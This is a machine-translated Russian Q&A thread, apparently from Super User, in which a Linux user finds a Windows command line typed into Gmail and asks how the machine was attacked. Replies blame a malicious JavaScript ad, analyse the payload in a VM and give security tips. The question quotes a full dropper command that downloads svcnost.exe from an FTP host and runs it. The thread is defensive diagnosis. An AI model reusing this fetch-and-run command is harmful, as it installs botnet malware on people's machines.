Как определить, был ли взломан мой Linux-компьютер?

Мой домашний ПК обычно включен, но монитор выключен. Сегодня вечером я вернулся с работы и обнаружил, что выглядит как попытка взлома: в моем браузере мой Gmail был открыт (это был я), но он был в режиме компоновки со следующим в поле TO :

Md / ​​c echo open cCTeamFtp.yi.org 21 >> ik & echo user ccteam10 765824 >> ik & echo binary >> ik & echo get svcnost.exe >> ik & echo bye >> ik & ftp -n -v -s: ik & del ik & Svcnost.exe & exit echo Вы получили

Это выглядит как код командной строки Windows для меня, и начало запуска кода в сочетании с тем, что Gmail находился в режиме компоновки, делает очевидным, что кто-то пытался запустить команду cmd . Я думаю, мне повезло, что я фактически не запускаю Windows на этом ПК, но у меня есть другие, которые это делают. Это первый случай, когда что-то подобное произошло со мной. Я не гуру Linux, и в то время я не запускал никаких других программ, кроме Firefox.

Я абсолютно уверен, что я не писал этого, и никто другой не был физически на моем компьютере. Кроме того, я недавно изменил свой пароль Google (и все мои другие пароли) на что-то вроде vMA8ogd7bv поэтому я не думаю, что кто-то взломал мою учетную запись Google.

Что сейчас произошло? Как кто-то нажимает клавиши на моем компьютере, когда это не старая компьютерная машина бабушки, которая много лет запускает вредоносное ПО, но недавно установила новую установку Ubuntu?

Обновить:
Позвольте мне рассмотреть некоторые вопросы и вопросы:

  • Я в Австрии, в сельской местности. Мой маршрутизатор WLAN запускает WPA2 / PSK и средне-сильный пароль, который отсутствует в словаре; Должны были быть грубой силой и менее чем в 50 метрах отсюда; Маловероятно, что его взломали.
  • Я использую USB-проводную клавиатуру, поэтому снова очень маловероятно, что кто-то может быть в пределах досягаемости, чтобы взломать его.
  • В то время я не использовал свой компьютер; Когда я был на работе. Это мониторный компьютер nettop, поэтому я редко выключаю его.
  • Машина только два месяца, работает только Ubuntu, и я не использую странное программное обеспечение или не посещаю странные сайты. Это главным образом Stack Exchange, Gmail и газеты. Нет игр. Ubuntu настроен на обновление.
  • Я не знаю, какой сервис VNC работает; Я, конечно, не установил и не включил его. Я также не запускал другие серверы. Я не уверен, что по умолчанию работает Ubuntu?
  • Я знаю все IP-адреса в активности аккаунта Gmail. Я уверен, что Google не был входом.
  • Я нашел средство просмотра файлов журнала , но я не знаю, что искать. Помогите?

То, что я действительно хочу знать, и что действительно заставляет меня чувствовать себя небезопасным, заключается в следующем: как может кто-нибудь из Интернета генерировать нажатия клавиш на моей машине? Как я могу предотвратить это, не имея об этом никакой информации? Я не Linux-разработчик, я отец, который сменил Windows на 20 лет и устал от этого. И всего через 18 лет, когда я был в сети, я никогда не видел никаких попыток взлома, так что это ново для меня.

Я сомневаюсь, что вам есть о чем беспокоиться. Скорее всего, была атака JavaScript, пытавшаяся загрузить диск . Если вас это беспокоит, начните использовать дополнения NoScript и AdBlock Plus Firefox.

Даже если вы посещаете надежные сайты, вы небезопасны, потому что они запускают код JavaScript от сторонних рекламодателей, которые могут быть вредоносными.

Я схватил его и провел в виртуальной машине. Он установил mirc, и это журнал состояния … http://pastebin.com/Mn85akMk

Это автоматическая атака, которая пытается заставить вас скачать mIRC и присоединиться к бот-сети, которая превратит вас в спамбот … Он подключился к VM и подключился к нескольким удаленным адресам, одним из которых является autoemail-119.west320.com .

Запустив его в Windows 7, мне пришлось принять приглашение UAC и разрешить ему доступ через брандмауэр.

Кажется, что есть тонны сообщений об этой точной команде на других форумах, и кто-то даже говорит, что торрент-файл пытался выполнить его, когда он был закончен для загрузки … Я не уверен, как это возможно.

Я не использовал это сам, но он должен быть в состоянии показать вам текущие сетевые подключения, чтобы вы могли видеть, связаны ли вы с чем-то из нормы: http://netactview.sourceforge.net/download.html

Я согласен с @ jb48394 в том, что это, вероятно, эксплойт JavaScript, как и все остальное в наши дни.

Тот факт, что он пытался открыть окно cmd (см . Комментарий @ torbengb ) и запускать вредоносную команду, а не просто загружать троянец незаметно в фоновом режиме, предполагает, что он использует некоторую уязвимость в Firefox, которая позволяет ему вводить ключевые штрихи, Но не запускать код.

Это также объясняет, почему этот эксплойт, который был явно написан исключительно для Windows, также работал бы в Linux: Firefox запускает JavaScript одинаково во всех ОС (по крайней мере, он пытается :)) . Если это вызвано переполнением буфера или подобным эксплойтом, предназначенным для Windows, это просто привело бы к сбою программы.

Что касается того, откуда появился код JavaScript – вероятно, вредоносная реклама Google (цикл рекламы в Gmail в течение дня) . Это будет не первый раз .

Я нашел аналогичную атаку на другой Linux-машине. Кажется, это какая-то команда FTP для Windows.

Это не отвечает на весь ваш вопрос, но в файле журнала просматриваются неудачные попытки входа в систему.

Если в вашем журнале более пяти неудачных попыток, кто-то попытался взломать root . Если есть успешная попытка входа в систему, когда вы находились вдали от своего компьютера, НЕОБХОДИМО ИЗМЕНИТЬ ВАШ ПАРОЛЬ! Я имею в виду ПРАВО СЕЙЧАС! Предпочтительно что-то буквенно-цифровое и около 10 символов.

С сообщениями, которые вы получили (команды echo ), это действительно звучит как незрелый сценарий kiddie . Если бы это был настоящий хакер, который знал, что он делает, вы, вероятно, все еще не знаете об этом.

Whois сообщает, что west320.com принадлежит Microsoft.

UPnP и Vino (System -> Preferences -> Remote Desktop) в сочетании со слабым паролем Ubuntu?

Вы использовали какие-либо нестандартные репозитории?

Ежегодно DEF CON проводит соревнования по Wi-Fi в отношении того, как далеко может быть достигнута точка доступа Wi-Fi – последнее, что я слышал, было 250 миль.

Если вы действительно хотите испугаться, посмотрите на скриншоты командно-n-контрольного центра ботнета Zeus . Никакая машина не безопасна, но Firefox в Linux более безопасен, чем остальные. Еще лучше, если вы запустите SELinux .

Interesting Posts
Давайте будем гением компьютера.